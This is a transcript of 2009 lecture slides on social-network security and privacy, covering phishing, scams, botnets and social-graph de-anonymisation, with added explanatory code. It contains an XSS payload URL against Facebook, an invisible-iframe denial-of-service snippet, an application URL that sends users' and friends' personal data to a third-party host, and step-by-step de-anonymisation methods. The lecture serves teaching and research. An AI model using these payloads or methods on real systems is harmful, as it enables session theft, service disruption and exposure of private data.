Social Networks and Security Checkpoint Sep 7, 2009 Joseph - - PowerPoint PPT Presentation



slide-1
SLIDE 1

Social Networks and Security

Checkpoint Sep 7, 2009

Joseph Bonneau, Computer Laboratory

slide-2
SLIDE 2

Hack #1: Photo URL Forging

Photo Exploits: PHP parameter fiddling (Ng, 2008)

slide-3
SLIDE 3

Hack #1: Photo URL Forging

Photo Exploits: Content Delivery Network URL fiddling

slide-4
SLIDE 4

Overview

  • I. The Social Network Ecosystem
  • II. Security
  • III. Privacy

slide-5
SLIDE 5

A Brief History

  • SixDegrees.com, 1997
  • Friendster, 2002
  • MySpace, 2003
  • Facebook, 2004
  • Twitter, 2006
  • Definitive account: danah boyd and Nicole Ellison, “Social Network Sites: Definition, History, and Scholarship,” 2007

slide-6
SLIDE 6

Exponential Growth

slide-7
SLIDE 7

Facebook is Everywhere...

Freetown Christiania (Copenhagen, Denmark)

slide-8
SLIDE 8

Demographics

Still fairly dominated by youth

slide-9
SLIDE 9

Demographics

Rapid growth in older demographics

slide-10
SLIDE 10

Global Growth

slide-11
SLIDE 11

Global Players (11/2008)

Credit: oxyweb.co.uk

slide-12
SLIDE 12

Global Players (4/2009)

Credit: Vincenzo Cosenza

slide-13
SLIDE 13

American Control

slide-14
SLIDE 14

Why Worry About Social Networks?

Just LAMP websites where you list your friends...

slide-15
SLIDE 15

The Surprising Depth of Facebook

Facebook Stream

slide-16
SLIDE 16

The Surprising Depth of Facebook

Facebook Applications

slide-17
SLIDE 17

The Surprising Depth of Facebook

Facebook Connect

slide-18
SLIDE 18

Web 2.0?

Function            Internet version     Facebook version
Page Markup         HTML, JavaScript     FBML
DB Queries          SQL                  FBQL
Email               SMTP                 FB Mail
Forums              Usenet, etc.         FB Groups
Instant Messages    XMPP                 FB Chat
News Streams        RSS                  FB Stream
Authentication      OpenID               FB Connect
Photo Sharing       Flickr, etc.         FB Photos
Video Sharing       YouTube, etc.        FB Video
Blogging            Blogger, etc.        FB Notes
Microblogging       Twitter, etc.        FB Status Updates
Micropayment        Peppercoin, etc.     FB Points
Event Planning      E-Vite               FB Events
Classified Ads      craigslist           FB Marketplace

slide-19
SLIDE 19

From Al Gore to Mark Zuckerberg

Facebook has essentially re-invented the Internet

− Centralised − Proprietary − Walled − Strong(er) identity

Killer addition is social context

slide-20
SLIDE 20

Parallel Trend: The Addition of Social Context

“Given sufficient funding, all web sites expand in functionality until users can add each other as friends”

slide-21
SLIDE 21

Facebook is the SNS that Matters

Dominant

− Largest and fastest-growing − Most internationally successful − Receives most media attention 

Advanced

− Largest feature-set − Most complex privacy model − Closest representation of real-life social world

slide-22
SLIDE 22

Hack #2: Facebook XSS

http://www.facebook.com/connect/prompt_permissions.php?ext_perm=read_stream

Credit: theharmonyguy

slide-23
SLIDE 23

Hack #2: Facebook XSS

http://www.facebook.com/connect/prompt_permissions.php?ext_perm=1

Credit: theharmonyguy

slide-24
SLIDE 24

Hack #2: Facebook XSS

http://www.facebook.com/connect/prompt_permissions.php?ext_perm=%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);%3C/script%3E

Credit: theharmonyguy
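
The three URLs on these slides differ only in the value of `ext_perm`, which suggests the page echoed that parameter into its HTML without escaping it. The sketch below is not Facebook's code (the slides do not show it); it only decodes the payload from the third URL and illustrates two generic defences, allow-list validation and output escaping. The names `ALLOWED_PERMS` and `render_perm` are hypothetical, and the allow-list contains only the one permission name that appears on the slides.

```python
import html
from urllib.parse import unquote

# Payload from the ext_perm parameter of the third URL (stray spaces removed).
PAYLOAD = (
    "%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);"
    "%3C/script%3E"
)

# Hypothetical allow-list; only "read_stream" appears in the slides.
ALLOWED_PERMS = {"read_stream"}


def render_perm(raw_value: str) -> str:
    """Return text that is safe to embed in an HTML page."""
    value = unquote(raw_value)
    if value in ALLOWED_PERMS:
        return value
    # Unknown value: escape it so the browser shows it as inert text.
    return html.escape(value)


decoded = unquote(PAYLOAD)
print(decoded)               # the script element a vulnerable page would run
print(render_perm(PAYLOAD))  # angle brackets and quotes replaced by entities
```

In a real handler, rejecting unknown values outright is usually preferable to rendering them at all; escaping is shown here only to make the difference visible.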

slide-25
SLIDE 25

Overview

  • I. The Social Network Ecosystem
  • II. Security
  • III. Privacy

slide-26
SLIDE 26

SNS Threat Model

slide-27
SLIDE 27

SNS Threat Model

Account compromise

− Email or SNS (practically the same) 

Computer compromise

Monetary Fraud

− Increasingly becoming a payment platform 

Service denial/mischief

slide-28
SLIDE 28

Web 2.0?

Function            Internet version     Facebook version
Page Markup         HTML, JavaScript     FBML
DB Queries          SQL                  FBQL
Email               SMTP                 FB Mail
Forums              Usenet, etc.         FB Groups
Instant Messages    XMPP                 FB Chat
News Streams        RSS                  FB Stream
Authentication      OpenID               FB Connect
Photo Sharing       Flickr, etc.         FB Photos
Video Sharing       YouTube, etc.        FB Video
Blogging            Blogger, etc.        FB Notes
Microblogging       Twitter, etc.        FB Status Updates
Micropayment        Peppercoin, etc.     FB Points
Event Planning      E-Vite               FB Events
Classified Ads      craigslist           FB Marketplace

slide-29
SLIDE 29

The Downside of Re-inventing the Internet

SNSs repeating all of the web's security problems

− Phishing − Spam − 419 Scams & Fraud − Identity Theft/Impersonation − Malware − Cross-site Scripting − Click-Fraud − Stalking, Harassment, Bullying, Blackmail

slide-30
SLIDE 30

Differences in the SNS world

Each has advantages and disadvantages

− Centralisation − Social Connections − Personal Information

slide-31
SLIDE 31

Phishing

Genuine Facebook emails

slide-32
SLIDE 32

Phishing

Phishing attempt, April 30, 2009

slide-33
SLIDE 33

Phishing

Phishing attempt, April 30, 2009

slide-34
SLIDE 34

Phishing

Major Phishing attempts, April 29-30, 2009

− Simple “look at this” messages − Users directed to www.fbstarter.com, www.fbaction.net − Phished credentials used to automatically log in, send more mail − Some users report passwords changed 

Most “elaborate” scheme seen yet

Phishtank reports Facebook 7th most common target

− Behind only banks, PayPal, eBay

slide-35
SLIDE 35

Why SNSs are Vulnerable to Phishing

“Social Phishing” is far more effective

− 72% successful in controlled study (Jagatic et al.) 

No TLS for login page

No anti-phishing measures

Frequent genuine emails with login-links

Users don't consider their SNS password valuable

Web 2.0 sites encourage password sharing...

slide-36
SLIDE 36

Password Sharing

slide-37
SLIDE 37

SNS Phishing Defense

Many advantages over email phishing prevention

− Real-time monitoring − Can block, revoke messages − Block outgoing links 

Fast response to recent attacks

− Emails blocked, removed, sites down within 24 hours

slide-38
SLIDE 38

Spam

Major factor in the decline of MySpace, Friendster

Attractive target

− Can message any user in the system − “Social Spam” much more effective than random spam − Account creation is very cheap

slide-39
SLIDE 39

Spam

slide-40
SLIDE 40

Spam

Many advantages for SNS

− Global monitoring, blocking − Automatically detect spammer profiles − Analyse link history − Analyse graph structure − Analyse profile 

Aggressively request CAPTCHAs

Legal: Facebook won US $873 M award

slide-41
SLIDE 41

Spam

Tough question: Spam vs. Viral Promotion?

Facebook moving to two-classes of user:

− User profiles bound to represent “real people”
    − Limits on friend count − Limits on usernames − Limits on messages
− “Pages” for celebrities, companies, bands, charities, etc.
    − Most limits removed − Subject to stricter control

slide-42
SLIDE 42

Malware

Koobface worm, launched August 2008

slide-43
SLIDE 43

Scams

Calvin: hey
Evan: holy moly. what's up man?
Calvin: i need your help urgently
Evan: yes sir
Calvin: am stuck here in london
Evan: stuck?
Calvin: yes i came here for a vacation
Calvin: on my process coming back home i was robbed inside the hotel i loged in
Evan: ok so what do you need
Calvin: can you loan me $900 to get a return ticket back home and pay my hotel bills
Evan: how do you want me to loan it to you?
Calvin: you can have the money send via western union

slide-44
SLIDE 44

Scams

Effective due to social context

− Skilled impersonators should be able to do much better 

Not much can be done to prevent

− Education 

Again, build detection system using social context, history

− Unexpected log-ins − References to Western Union, etc.
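
The two signals listed above can be combined into a very rough scoring rule. This is a minimal sketch under stated assumptions, not a description of any deployed system: the pattern list, the weights, and the threshold are all hypothetical. “western union” comes from the slide; the other keywords are taken from the example conversation on the previous slide.

```python
import re

# Hypothetical patterns: "western union" is from the slide, the rest are
# words that appear in the example scam conversation.
SUSPICIOUS_PATTERNS = [
    r"western union",
    r"\bloan\b",
    r"\burgently\b",
    r"\bstuck\b",
]


def scam_score(message: str, unexpected_login: bool) -> int:
    """Count matching patterns; add a fixed bonus for an unexpected log-in."""
    text = message.lower()
    score = sum(1 for pattern in SUSPICIOUS_PATTERNS if re.search(pattern, text))
    if unexpected_login:
        score += 2  # assumed weight, chosen only for illustration
    return score


def should_flag(message: str, unexpected_login: bool, threshold: int = 3) -> bool:
    """Flag a message for review once the score reaches the threshold."""
    return scam_score(message, unexpected_login) >= threshold
```

For example, `should_flag("you can have the money send via western union", True)` is flagged, while the same sentence from a session with no unexpected log-in scores below the default threshold. A real detector would also need to use conversation history and the social graph, as the slide suggests.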

slide-45
SLIDE 45

Malware

Koobface worm, launched August 2008

slide-46
SLIDE 46

Malware

Similar to Phishing

− Rapid spread via social context − SNS can use social context to detect − Also, warn users leaving site

slide-47
SLIDE 47

Malware Defense

slide-48
SLIDE 48

Botnet Command & Control

Twitterbot, August 2009

slide-49
SLIDE 49

Botnet Command & Control

Social channels identified in 2009 as optimal for botnet C&C

− Particularly Skype, MSN messenger, also Twitter, Facebook − Seen in the wild August 2009 

Can be monitored by service operator, but no incentive

slide-50
SLIDE 50

SNS-hosted botnet

Idea: add malicious JavaScript payload to a popular application

Example: Denial of Service:

<iframe name="1" style="border: 0px none #ffffff; width: 0px; height: 0px;" src="http://victim-host/image1.jpg"></iframe><br/>

“Facebot” - Elias Athanasopoulos, A. Makridakis, D. Antoniades, S. Antonatos, Sotiris Ioannidis, K. G. Anagnostakis and Evangelos P. Markatos. “Antisocial Networks: Turning a Social Network into a Botnet,” 2008.

slide-51
SLIDE 51

Common Trends

Social channels increase susceptibility to scams

− Personal information also aids greatly in targeted attacks 

Fundamental issue: SNS environment leads to carelessness

− Rapid, erratic browsing − Applications installed with little scrutiny − Fun, noisy, unpredictable environment − People use SNS with their brain turned off

slide-52
SLIDE 52

Common Trends

  • Centralisation helps in prevention

− Complete control of messaging platform, blocking, revocation

  • Social Context also useful

− Can develop strong IDS

slide-53
SLIDE 53

Web Hacking

Most SNS have a poor security track record

− Rapid growth − Complicated site design − Many feature interactions 

Lack of attention to security

− Over half of sites failing even to deploy TLS properly!

slide-54
SLIDE 54

FBML Translation

Facebook Markup Language

Translated into HTML:

Result: arbitrary JavaScript execution (Felt, 2007)

slide-55
SLIDE 55

Facebook Query Language

Facebook Query Language Exploits (Bonneau, Anderson, Danezis, 2009)

slide-56
SLIDE 56

Hack #3: Facebook XSRF/Automatic Authentication

Credit: Ronan Zilberman

slide-57
SLIDE 57

Overview

  • I. The Social Network Ecosystem
  • II. Security
  • III. Privacy

slide-58
SLIDE 58

Data of Interest

slide-59
SLIDE 59

Data of Interest

Profile Data

− Loads of PII (contact info, address, DOB) − Tastes, preferences 

Graph Data

− Friendship connections − Common group membership − Communication patterns 

Activity Data

− Time, frequency of log-in, typical behavior

slide-60
SLIDE 60

Interested Parties

Data Aggregation

− Marketers, Insurers, Credit Ratings Agencies, Intelligence, etc. − SNS operator implicitly included − Often, graph information is more important than profiles 

Targeted Data Leaks

− Employers, Universities, Fraudsters, Local Police, Friends, etc. − Usually care about profile data and photos

slide-61
SLIDE 61

Major Privacy Problems

Data is shared in ways that most users don't expect

“Contextual integrity” not maintained

Three main drivers:

− Poor implementation − Misaligned incentives & economic pressure − Indirect information leakage

slide-62
SLIDE 62

Poor Implementation

slide-63
SLIDE 63

Poor Implementation

Orkut Photo Tagging

slide-64
SLIDE 64

Poor Implementation

Facebook Connect

slide-65
SLIDE 65

Poor Implementation

Applications given full access to profile data of installed users

Even less revenue available for application developers...

slide-66
SLIDE 66

Poor Implementation

Better architectures proposed

− Privacy by proxy − Privacy by sandboxing

slide-67
SLIDE 67

Economic Pressure

Most SNSs still lose money

− Advertising business model yet to prove its viability 

Grow first, monetize later

− “Growth is primary, revenue is secondary” - Mark Zuckerberg 

Privacy is often an impediment to new features

slide-68
SLIDE 68

Economic Pressure

Major survey of 45 social networks' privacy practices

Key Conclusions:

− “Market for privacy” fundamentally broken − Huge network effects, lock-in, lemons market − Sites with better privacy less likely to mention it!

slide-69
SLIDE 69

Promotional Techniques

slide-70
SLIDE 70

Promotional Techniques

slide-71
SLIDE 71

Terms of Service

Most Terms of Service reserve broad rights to user data

Terms of Service, hi5:

slide-72
SLIDE 72

Information leaked by the Social Graph...

slide-73
SLIDE 73

“Traditional” Social Network Analysis

  • Performed by sociologists, anthropologists, etc. since the 1970s
  • Use data carefully collected through interviews & observation
  • Typically < 100 nodes
  • Complete knowledge
  • Links have consistent meaning
  • All of these assumptions fail badly for online social network data
slide-74
SLIDE 74

Traditional Graph Theory

  • Nice Proofs
  • Tons of definitions
  • Ignored topics:
  • Large graphs
  • Sampling
  • Uncertainty
slide-75
SLIDE 75

Models Of Complex Networks From Math & Physics

Many nice models

  • Erdos-Renyi
  • Watts-Strogatz
  • Barabasi-Albert

Social Networks properties:

  • Power-law
  • Small-world
  • High clustering coefficient
slide-76
SLIDE 76

Real social graphs are complicated!

slide-77
SLIDE 77

When In Doubt, Compute!

We do know many graph algorithms:

  • Find important nodes
  • Identify communities
  • Train classifiers
  • Identify anomalous connections

Major Privacy Implications!

slide-78
SLIDE 78

Privacy Questions

  • What can we infer purely from link structure?
slide-79
SLIDE 79

Privacy Questions

  • What can we infer purely from link structure?

A surprising amount!

  • Popularity
  • Centrality
  • Introvert vs. Extrovert
  • Leadership potential
  • Communities
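
As one illustration of how much a bare edge list reveals, the sketch below computes normalised degree centrality, a simple proxy for the “popularity” and “centrality” items in the list. The toy edge list is hypothetical, and degree centrality is only one of many measures an analyst might use.

```python
from collections import defaultdict


def degree_centrality(edges):
    """Map each node to its degree divided by (number of nodes - 1)."""
    neighbours = defaultdict(set)
    for a, b in edges:
        if a == b:
            continue  # ignore self-loops
        neighbours[a].add(b)
        neighbours[b].add(a)
    n = len(neighbours)
    return {node: len(nbrs) / (n - 1) for node, nbrs in neighbours.items()}


# Hypothetical toy graph: no profile data at all, only who is linked to whom.
toy_edges = [("A", "B"), ("A", "C"), ("A", "D"), ("D", "E")]
centrality = degree_centrality(toy_edges)
most_connected = max(centrality, key=centrality.get)
print(most_connected, centrality[most_connected])
```
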
slide-80
SLIDE 80

Privacy Questions

  • If we know nothing about a node but its neighbours, what can we infer?
slide-81
SLIDE 81

Privacy Questions

  • If we know nothing about a node but its neighbours, what can we infer?

A lot!

  • Gender
  • Political Beliefs
  • Location
  • Breed?
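
A simple way to see why neighbours leak attributes is a majority vote over whatever the neighbours disclose. The sketch below is an illustrative baseline, not the method of any particular study; the function name `infer_attribute` and the sample data are hypothetical.

```python
from collections import Counter


def infer_attribute(node, neighbours, known_labels):
    """Guess a node's attribute as the most common value among its neighbours.

    Returns None when no neighbour discloses the attribute or the vote is tied.
    """
    votes = Counter(
        known_labels[n] for n in neighbours.get(node, []) if n in known_labels
    )
    ranked = votes.most_common(2)
    if not ranked:
        return None
    if len(ranked) == 2 and ranked[0][1] == ranked[1][1]:
        return None  # tie between the two most common values
    return ranked[0][0]


# Hypothetical data: the target hides its location, three friends do not.
neighbours = {"target": ["a", "b", "c", "d"]}
known_locations = {"a": "Cambridge", "b": "Cambridge", "c": "London"}
print(infer_attribute("target", neighbours, known_locations))
```
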
slide-82
SLIDE 82

Privacy Questions

  • Can we anonymise graphs?
slide-83
SLIDE 83

Privacy Questions

  • Can we anonymise graphs?

Not easily...

  • Seminal result by Backstrom et al.: Active attack needs just 7 nodes
  • Can do even better given user's complete neighborhood
  • Also results for correlating users across networks
  • Developing line of research...

slide-84
SLIDE 84

De-anonymisation (active)

[Figure: graph with nodes A through I]

A Social Graph with Private Links

slide-85
SLIDE 85

De-anonymisation (active)

[Figure: graph with nodes A through I plus attacker nodes 1 through 5]

Attacker adds k nodes with random edges

slide-86
SLIDE 86

De-anonymisation (active)

[Figure: graph with nodes A through I plus attacker nodes 1 through 5]

Attacker links to targeted nodes

slide-87
SLIDE 87

De-anonymisation (active)

Graph is anonymised and edges are released

slide-88
SLIDE 88

De-anonymisation (active)

[Figure: attacker nodes 1 through 5 located in the anonymised graph]

Attacker searches for unique k-subgroup

slide-89
SLIDE 89

De-anonymisation (active)

[Figure: attacker nodes 1 through 5 with targeted nodes G and H]

Link between targeted nodes is confirmed

slide-90
SLIDE 90

De-anonymisation (passive)

  • Similar to above, except k normal users collude and share their links
  • Only compromise random targets
slide-91
SLIDE 91

De-anonymisation results

  • 7 nodes need to be created in active attack
  • De-anonymize 70 chosen nodes!
  • 7 nodes in passive coalition compromise ~ 10 random nodes
slide-92
SLIDE 92

Cross-graph De-anonymisation

  • Goal: identify users in a private graph by mapping to public graph
  • “Shouldn't” work: subgraph isomorphism is NP-complete
  • Works quite well in practice on real graphs!
slide-93
SLIDE 93

Cross-graph De-anonymisation

Public Graph Private Graph

slide-94
SLIDE 94

Cross-graph De-anonymisation

[Figure: public and private graphs, with nodes A, B, C matched to A', B', C']

Step 1: Identify Seed Nodes

slide-95
SLIDE 95

Cross-graph De-anonymisation

[Figure: public and private graphs, with nodes A, B, C, D matched to A', B', C', D']

Step 2: Assign mappings based on mapped neighbors

slide-96
SLIDE 96

Cross-graph De-anonymisation

[Figure: public and private graphs, with nodes A, B, C, D, E matched to A', B', C', D', E']

Step 3: Iterate
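
The three steps can be sketched as a small propagation loop. This is a heavily simplified illustration and not the published algorithm, which the slides do not spell out: here a private node is matched to the unused public node that shares the most already-mapped neighbours, and only when that best candidate is unique. The graphs, the seed choice, and the function name `propagate` are hypothetical.

```python
def propagate(public, private, seeds):
    """Extend a seed mapping (private node -> public node) by neighbour overlap."""
    mapping = dict(seeds)
    changed = True
    while changed:  # Step 3: iterate until no new node can be mapped
        changed = False
        used = set(mapping.values())
        for node in sorted(private):
            if node in mapping:
                continue
            # Public identities of this node's already-mapped neighbours.
            mapped_nbrs = {mapping[n] for n in private[node] if n in mapping}
            # Step 2: score every unused public node by shared mapped neighbours.
            scores = {
                cand: len(mapped_nbrs & public[cand])
                for cand in public
                if cand not in used
            }
            if not scores:
                continue
            best = max(scores.values())
            winners = [cand for cand, s in scores.items() if s == best]
            if best > 0 and len(winners) == 1:
                mapping[node] = winners[0]
                used.add(winners[0])
                changed = True
    return mapping


# Hypothetical toy graphs with identical structure; primes mark private nodes.
public = {
    "A": {"B", "C", "D"}, "B": {"A", "C", "D"}, "C": {"A", "B", "E"},
    "D": {"A", "B", "E"}, "E": {"C", "D"},
}
private = {
    "A'": {"B'", "C'", "D'"}, "B'": {"A'", "C'", "D'"}, "C'": {"A'", "B'", "E'"},
    "D'": {"A'", "B'", "E'"}, "E'": {"C'", "D'"},
}
seeds = {"A'": "A", "B'": "B", "C'": "C"}  # Step 1: seed nodes known in advance
result = propagate(public, private, seeds)
print(result)
```

On real data the two graphs overlap only partially and contain noise, so a practical attack needs stricter acceptance criteria than a unique maximum.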

slide-97
SLIDE 97

Cross-graph De-anonymisation

  • Demonstrated on Twitter and Flickr
  • Only 24% of Twitter users on Flickr, 5% of Flickr users on Twitter
  • 31% of common users identified (~9,000) given just 30 seeds!
  • Real-world attacks can be much more powerful
  • Auxiliary knowledge
  • Mapping of attributes, language use, etc.
slide-98
SLIDE 98

Privacy Questions

  • What can we infer if we “compromise” a fraction of nodes?
slide-99
SLIDE 99

Privacy Questions

  • What can we infer if we “compromise” a fraction of nodes?

A lot...

  • Common theme: small groups of nodes can see the rest
  • Danezis et al.
  • Nagaraja
  • Korolova et al.
  • Bonneau et al.

slide-100
SLIDE 100

Privacy Questions

  • What if we get a subset of neighbours for all nodes?

slide-101
SLIDE 101

Privacy Questions

  • What if we get a subset of k neighbours for all nodes?

Emerging question for many social graphs

  • Facebook and online SNS
  • Mobile SNS

slide-102
SLIDE 102

A Quietly Introduced Feature...

Public Search Listings, Sep 2007

slide-103
SLIDE 103

Attack Scenario

  • Spider all public listings
  • Our experiments crawled 250 k users daily
  • Implies ~800 CPU-days to recover all users
  • Use sampled graph to compute functions of original
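
The two crawl figures above can be combined with simple arithmetic. The sketch below only multiplies the slide's own numbers; the resulting total is an inference rather than a figure stated on the slide, and the perfect-parallelism assumption in `wall_clock_days` is hypothetical (it ignores rate limiting and blocking).

```python
USERS_PER_DAY = 250_000  # crawl rate from the slide
CPU_DAYS = 800           # estimate from the slide

# Total number of public listings implied by the two figures together.
implied_total_users = USERS_PER_DAY * CPU_DAYS


def wall_clock_days(machines: int) -> float:
    """Days needed if the crawl is split evenly across identical machines."""
    return CPU_DAYS / machines


print(implied_total_users)   # listings implied by the slide's numbers
print(wall_clock_days(100))  # elapsed days with 100 crawlers, assuming no limits
```
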
slide-104
SLIDE 104

Estimating Degrees

3 3 3 4 4 2 1 2 6

Average Degree: 3.5

slide-105
SLIDE 105

Estimating Degrees

3 3 3 4 4 2 1 2 6

Sampled with k=2

slide-106
SLIDE 106

Estimating Degrees

? ? ? ? ? ? 1 ? ?

Degree known exactly for one node

slide-107
SLIDE 107

Estimating Degrees

3.5 3.5 1.75 3.5 5.25 1.75 1 1.75 7

Naïve approach: Multiply in-degree by average degree / k

slide-108
SLIDE 108

Estimating Degrees

3.5 3.5 2 3.5 5.25 2 1 2 7

Raise estimates which are less than k
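
The first two estimation steps (the naïve scaling and the raise to k) can be reproduced directly from the numbers on the slides. In this sketch the in-degree list is an assumption: it is back-computed by dividing each naïve estimate by 3.5 / 2, since the sampled graph itself is only shown as a figure. The later iterative scaling and normalisation steps are not reproduced because the slides do not specify them fully.

```python
def naive_estimates(in_degrees, exact, avg_degree, k):
    """Scale each sampled in-degree by avg_degree / k; keep exactly known degrees."""
    scale = avg_degree / k
    return [
        float(exact[i]) if i in exact else d * scale
        for i, d in enumerate(in_degrees)
    ]


def raise_to_k(estimates, exact, k):
    """A node that listed k neighbours has degree at least k, so lift low estimates."""
    return [
        e if i in exact else max(e, float(k))
        for i, e in enumerate(estimates)
    ]


K = 2
AVG_DEGREE = 3.5                           # average degree as given on the slide
IN_DEGREES = [2, 2, 1, 2, 3, 1, 1, 1, 4]   # assumed, back-computed from the slide
EXACT = {6: 1}                             # the node whose degree is known exactly
                                           # (its in-degree entry is not used)

naive = naive_estimates(IN_DEGREES, EXACT, AVG_DEGREE, K)
raised = raise_to_k(naive, EXACT, K)
print(naive)
print(raised)
```
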

slide-109
SLIDE 109

Estimating Degrees

3.5 3.5 2 3.5 5.25 2 1 2 7

Nodes with high-degree neighbors underestimated

slide-110
SLIDE 110

Estimating Degrees

3.5 3.5 3.5 3.5 5.25 2 1 2 7

Iteratively scale by current estimate / k in each step

slide-111
SLIDE 111

Estimating Degrees

2.75 2.75 3.5 3.63 5.5 2 1 2 5.5

After 1 iteration

slide-112
SLIDE 112

Estimating Degrees

2.68 2.68 3.41 3.53 5.35 2 1 2 5.35

Normalise to estimated total degree

slide-113
SLIDE 113

Estimating Degrees

2.48 2.83 3.04 3.64 5.09 2 1 2 5.91

Convergence after n > 10 iterations

slide-114
SLIDE 114

Estimating Degrees

  • Converges fast, typically after 10 iterations
  • Absolute error is high: 38% on average
  • Reduced to 23% for nodes with d ≥ 50
  • Can still accurately pick out high-degree nodes
slide-115
SLIDE 115

Aggregate of x highest-degree nodes

slide-116
SLIDE 116

Approximable Functions

  • Node Degree
  • Dominating Set
  • Betweenness Centrality
  • Path Length
  • Community Structure

slide-117
SLIDE 117

Conclusions

  • Social networking coming to dominate the web
  • Many old security lessons being re-learned
  • Social context changes fraud environment
  • Social graph challenging privacy requirements

slide-118
SLIDE 118

Hack #4: Application Data Theft

What happens when you take a quiz...

slide-119
SLIDE 119

Hack #4: Application Data Theft

Facebook Application Architecture

slide-120
SLIDE 120

Hack #4: Application Data Theft

URL for banner ad

http://sochr.com/i.php&name=[Joseph Bonneau]&nx=[My User ID]&age=[My DOB]&gender=[My Gender]&pic=[My Photo URL]&fname0=[Friend #1 Name]&fname1=[Friend #2 Name]&fname2=[Friend #3 Name]&fname3=[Friend #4 Name]&fpic0=[Friend #1 Photo URL]&fpic1=[Friend #2 Photo URL]&fpic2=[Friend #3 Photo URL]&fpic3=[Friend #4 Photo URL]&fb_session_params=[All of the quiz application's session parameters]

slide-121
SLIDE 121

Hack #4: Application Data Theft

Query made by banner ad through user's browser

select uid, birthday, current_location, sex, first_name, name, pic_square, relationship_status FROM user WHERE uid IN (select uid2 from friend where uid1 = '[current user id]') and strlen(pic) > 0 order by rand() limit 500
slide-122
SLIDE 122

Hack #4: Application Data Theft

What the user sees...

slide-123
SLIDE 123

My Reading List

  • http://www.cl.cam.ac.uk/~jcb82/sns_bib/main.html
  • Questions?